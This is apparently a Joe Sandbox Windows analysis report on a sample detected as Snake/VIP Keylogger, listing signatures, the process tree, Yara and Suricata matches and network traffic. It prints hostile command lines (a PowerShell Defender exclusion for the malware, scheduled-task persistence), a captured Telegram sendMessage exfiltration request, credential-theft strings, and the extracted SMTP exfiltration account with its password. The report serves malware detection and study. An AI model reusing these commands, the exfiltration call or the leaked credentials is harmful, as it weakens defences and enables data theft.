Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
ckHregxJIq.exe

Overview

General Information

Sample name:ckHregxJIq.exe
renamed because original name is a hash value
Original sample name:0fdc25f5430a61cd969c0bcb2e5ed6965d4eb4dc73374649eeaf5a6b77498d6d.exe
Analysis ID:1631774
MD5:883059896b4f09e5a2ba9e0e737c0f9a
SHA1:04bd4c5913eca0eee07c21324e1478d7c4791355
SHA256:0fdc25f5430a61cd969c0bcb2e5ed6965d4eb4dc73374649eeaf5a6b77498d6d
Tags:exeuser-adrian__luca
Infos:

Detection

Snake Keylogger, VIP Keylogger
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
.NET source code contains potential unpacker
.NET source code contains very large array initializations
.NET source code references suspicious native API functions
Adds a directory exclusion to Windows Defender
Contains functionality to capture screen (.Net source)
Contains functionality to log keystrokes (.Net Source)
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Sample uses string decryption to hide its real strings
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Uses the Telegram API (likely for C&C communication)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • ckHregxJIq.exe (PID: 7868 cmdline: "C:\Users\user\Desktop\ckHregxJIq.exe" MD5: 883059896B4F09E5A2BA9E0E737C0F9A)
    • powershell.exe (PID: 7512 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ckHregxJIq.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7516 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7528 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 5736 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 1988 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 5324 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\aFAsiNcQRJEVeL" /XML "C:\Users\user\AppData\Local\Temp\tmpD0A2.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 5548 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • ckHregxJIq.exe (PID: 5320 cmdline: "C:\Users\user\Desktop\ckHregxJIq.exe" MD5: 883059896B4F09E5A2BA9E0E737C0F9A)
    • ckHregxJIq.exe (PID: 5956 cmdline: "C:\Users\user\Desktop\ckHregxJIq.exe" MD5: 883059896B4F09E5A2BA9E0E737C0F9A)
  • aFAsiNcQRJEVeL.exe (PID: 1292 cmdline: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe MD5: 883059896B4F09E5A2BA9E0E737C0F9A)
    • schtasks.exe (PID: 5492 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\aFAsiNcQRJEVeL" /XML "C:\Users\user\AppData\Local\Temp\tmpE071.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 5008 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • aFAsiNcQRJEVeL.exe (PID: 5472 cmdline: "C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe" MD5: 883059896B4F09E5A2BA9E0E737C0F9A)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"Exfil Mode": "SMTP", "Email ID": "report3log@cybertechllc.top", "Password": "7213575aceACE@", "Host": "mail.cybertechllc.top", "Port": "587"}
{"Exfil Mode": "SMTP", "Username": "report3log@cybertechllc.top", "Password": "7213575aceACE@", "Host": "mail.cybertechllc.top", "Port": "587", "Version": "4.4"}
SourceRuleDescriptionAuthorStrings
0000000E.00000002.3723375088.000000000043D000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    0000000F.00000002.1348460508.0000000004169000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      0000000F.00000002.1348460508.0000000004169000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
        0000000F.00000002.1348460508.0000000004169000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
          0000000F.00000002.1348460508.0000000004169000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
          • 0x2e630:$a1: get_encryptedPassword
          • 0x2ebb8:$a2: get_encryptedUsername
          • 0x2e2a3:$a3: get_timePasswordChanged
          • 0x2e3ba:$a4: get_passwordField
          • 0x2e646:$a5: set_encryptedPassword
          • 0x31362:$a6: get_passwords
          • 0x316f6:$a7: get_logins
          • 0x3134e:$a8: GetOutlookPasswords
          • 0x30d07:$a9: StartKeylogger
          • 0x3164f:$a10: KeyLoggerEventArgs
          • 0x30da7:$a11: KeyLoggerEventArgsEventHandler
          Click to see the 28 entries
          SourceRuleDescriptionAuthorStrings
          15.2.aFAsiNcQRJEVeL.exe.4169990.1.raw.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            15.2.aFAsiNcQRJEVeL.exe.4169990.1.raw.unpackJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
              15.2.aFAsiNcQRJEVeL.exe.4169990.1.raw.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                15.2.aFAsiNcQRJEVeL.exe.4169990.1.raw.unpackWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
                • 0x2dca0:$a1: get_encryptedPassword
                • 0x2e228:$a2: get_encryptedUsername
                • 0x2d913:$a3: get_timePasswordChanged
                • 0x2da2a:$a4: get_passwordField
                • 0x2dcb6:$a5: set_encryptedPassword
                • 0x309d2:$a6: get_passwords
                • 0x30d66:$a7: get_logins
                • 0x309be:$a8: GetOutlookPasswords
                • 0x30377:$a9: StartKeylogger
                • 0x30cbf:$a10: KeyLoggerEventArgs
                • 0x30417:$a11: KeyLoggerEventArgsEventHandler
                15.2.aFAsiNcQRJEVeL.exe.4169990.1.raw.unpackMAL_Envrial_Jan18_1Detects Encrial credential stealer malwareFlorian Roth
                • 0x3b2ce:$a2: \Comodo\Dragon\User Data\Default\Login Data
                • 0x3a971:$a3: \Google\Chrome\User Data\Default\Login Data
                • 0x3abce:$a4: \Orbitum\User Data\Default\Login Data
                • 0x3b5ad:$a5: \Kometa\User Data\Default\Login Data
                Click to see the 41 entries

                System Summary

                barindex
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ckHregxJIq.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ckHregxJIq.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\ckHregxJIq.exe", ParentImage: C:\Users\user\Desktop\ckHregxJIq.exe, ParentProcessId: 7868, ParentProcessName: ckHregxJIq.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ckHregxJIq.exe", ProcessId: 7512, ProcessName: powershell.exe
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ckHregxJIq.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ckHregxJIq.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\ckHregxJIq.exe", ParentImage: C:\Users\user\Desktop\ckHregxJIq.exe, ParentProcessId: 7868, ParentProcessName: ckHregxJIq.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ckHregxJIq.exe", ProcessId: 7512, ProcessName: powershell.exe
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\aFAsiNcQRJEVeL" /XML "C:\Users\user\AppData\Local\Temp\tmpE071.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\aFAsiNcQRJEVeL" /XML "C:\Users\user\AppData\Local\Temp\tmpE071.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe, ParentImage: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe, ParentProcessId: 1292, ParentProcessName: aFAsiNcQRJEVeL.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\aFAsiNcQRJEVeL" /XML "C:\Users\user\AppData\Local\Temp\tmpE071.tmp", ProcessId: 5492, ProcessName: schtasks.exe
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\aFAsiNcQRJEVeL" /XML "C:\Users\user\AppData\Local\Temp\tmpD0A2.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\aFAsiNcQRJEVeL" /XML "C:\Users\user\AppData\Local\Temp\tmpD0A2.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\ckHregxJIq.exe", ParentImage: C:\Users\user\Desktop\ckHregxJIq.exe, ParentProcessId: 7868, ParentProcessName: ckHregxJIq.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\aFAsiNcQRJEVeL" /XML "C:\Users\user\AppData\Local\Temp\tmpD0A2.tmp", ProcessId: 5324, ProcessName: schtasks.exe
                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ckHregxJIq.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ckHregxJIq.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\ckHregxJIq.exe", ParentImage: C:\Users\user\Desktop\ckHregxJIq.exe, ParentProcessId: 7868, ParentProcessName: ckHregxJIq.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ckHregxJIq.exe", ProcessId: 7512, ProcessName: powershell.exe

                Persistence and Installation Behavior

                barindex
                Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\aFAsiNcQRJEVeL" /XML "C:\Users\user\AppData\Local\Temp\tmpD0A2.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\aFAsiNcQRJEVeL" /XML "C:\Users\user\AppData\Local\Temp\tmpD0A2.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\ckHregxJIq.exe", ParentImage: C:\Users\user\Desktop\ckHregxJIq.exe, ParentProcessId: 7868, ParentProcessName: ckHregxJIq.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\aFAsiNcQRJEVeL" /XML "C:\Users\user\AppData\Local\Temp\tmpD0A2.tmp", ProcessId: 5324, ProcessName: schtasks.exe
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-03-07T15:37:26.094763+010028033053Unknown Traffic192.168.2.549695104.21.96.1443TCP
                2025-03-07T15:37:30.962378+010028033053Unknown Traffic192.168.2.549699104.21.96.1443TCP
                2025-03-07T15:37:31.392538+010028033053Unknown Traffic192.168.2.549700104.21.96.1443TCP
                2025-03-07T15:37:34.972982+010028033053Unknown Traffic192.168.2.549703104.21.96.1443TCP
                2025-03-07T15:37:42.318533+010028033053Unknown Traffic192.168.2.549713104.21.96.1443TCP
                2025-03-07T15:37:49.811479+010028033053Unknown Traffic192.168.2.549719104.21.96.1443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-03-07T15:37:18.925141+010028032742Potentially Bad Traffic192.168.2.549693132.226.247.7380TCP
                2025-03-07T15:37:22.425163+010028032742Potentially Bad Traffic192.168.2.549693132.226.247.7380TCP
                2025-03-07T15:37:23.612670+010028032742Potentially Bad Traffic192.168.2.549696132.226.247.7380TCP
                2025-03-07T15:37:27.018898+010028032742Potentially Bad Traffic192.168.2.549698132.226.247.7380TCP
                2025-03-07T15:37:27.034530+010028032742Potentially Bad Traffic192.168.2.549696132.226.247.7380TCP
                2025-03-07T15:37:32.315819+010028032742Potentially Bad Traffic192.168.2.549702132.226.247.7380TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-03-07T15:37:57.371515+010018100071Potentially Bad Traffic192.168.2.549728149.154.167.220443TCP
                2025-03-07T15:38:00.128154+010018100071Potentially Bad Traffic192.168.2.549729149.154.167.220443TCP

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: ckHregxJIq.exeAvira: detected
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeAvira: detection malicious, Label: TR/AD.SnakeStealer.twncj
                Source: 00000001.00000002.1302654676.0000000003E93000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "report3log@cybertechllc.top", "Password": "7213575aceACE@", "Host": "mail.cybertechllc.top", "Port": "587"}
                Source: 00000001.00000002.1302654676.0000000003E93000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "report3log@cybertechllc.top", "Password": "7213575aceACE@", "Host": "mail.cybertechllc.top", "Port": "587", "Version": "4.4"}
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeReversingLabs: Detection: 81%
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeVirustotal: Detection: 70%Perma Link
                Source: ckHregxJIq.exeReversingLabs: Detection: 81%
                Source: ckHregxJIq.exeVirustotal: Detection: 70%Perma Link
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Source: 15.2.aFAsiNcQRJEVeL.exe.4169990.1.raw.unpackString decryptor: report3log@cybertechllc.top
                Source: 15.2.aFAsiNcQRJEVeL.exe.4169990.1.raw.unpackString decryptor: 7213575aceACE@
                Source: 15.2.aFAsiNcQRJEVeL.exe.4169990.1.raw.unpackString decryptor: mail.cybertechllc.top
                Source: 15.2.aFAsiNcQRJEVeL.exe.4169990.1.raw.unpackString decryptor: report3@cybertechllc.top
                Source: 15.2.aFAsiNcQRJEVeL.exe.4169990.1.raw.unpackString decryptor: 587
                Source: 15.2.aFAsiNcQRJEVeL.exe.4169990.1.raw.unpackString decryptor:

                Location Tracking

                barindex
                Source: unknownDNS query: name: reallyfreegeoip.org
                Source: ckHregxJIq.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.5:49694 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.5:49697 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49728 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49729 version: TLS 1.2
                Source: ckHregxJIq.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: C:\Users\user\Desktop\ckHregxJIq.exeCode function: 4x nop then jmp 02F2F8E9h14_2_02F2F630
                Source: C:\Users\user\Desktop\ckHregxJIq.exeCode function: 4x nop then jmp 02F2FD41h14_2_02F2FA88
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeCode function: 4x nop then jmp 015EF8E9h19_2_015EF631
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeCode function: 4x nop then jmp 015EFD41h19_2_015EFA88

                Networking

                barindex
                Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.5:49728 -> 149.154.167.220:443
                Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.5:49729 -> 149.154.167.220:443
                Source: unknownDNS query: name: api.telegram.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:061544%0D%0ADate%20and%20Time:%2009/03/2025%20/%2004:45:16%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20061544%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:061544%0D%0ADate%20and%20Time:%2008/03/2025%20/%2021:28:24%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20061544%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                Source: Joe Sandbox ViewIP Address: 104.21.96.1 104.21.96.1
                Source: Joe Sandbox ViewIP Address: 104.21.96.1 104.21.96.1
                Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                Source: unknownDNS query: name: checkip.dyndns.org
                Source: unknownDNS query: name: reallyfreegeoip.org
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49698 -> 132.226.247.73:80
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49702 -> 132.226.247.73:80
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49696 -> 132.226.247.73:80
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49693 -> 132.226.247.73:80
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49703 -> 104.21.96.1:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49700 -> 104.21.96.1:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49719 -> 104.21.96.1:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49699 -> 104.21.96.1:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49695 -> 104.21.96.1:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49713 -> 104.21.96.1:443
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
